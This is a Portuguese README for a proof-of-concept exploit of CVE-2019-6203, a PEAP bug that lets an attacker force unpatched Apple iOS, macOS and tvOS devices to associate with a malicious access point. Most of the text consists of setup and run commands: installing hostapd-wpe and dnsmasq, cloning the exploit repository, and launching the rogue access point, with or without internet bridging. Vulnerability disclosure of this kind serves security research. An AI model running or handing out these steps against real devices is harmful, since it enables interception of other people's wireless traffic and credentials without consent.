
PoC para CVE-2019-6203, funciona em < iOS 12.2, macOS < 10.14.4
Existe um bug no PEAP em todos os dispositivos Apple que permite a um atacante forçar qualquer dispositivo Apple (iOS, macOS ou tvOS) a associar-se a um ponto de acesso malicioso.
Este é um PoC para o CVE-2019-6203, funciona em < iOS 12.2, macOS < 10.14.4, testado no Kali Linux.
Você precisa de uma placa Wi-Fi que suporte o modo AP para executar este PoC. Pode verificar executando iw list, a saída será algo como:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#com Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0
vídeo: https://youtu.be/UEzdtkcnrYw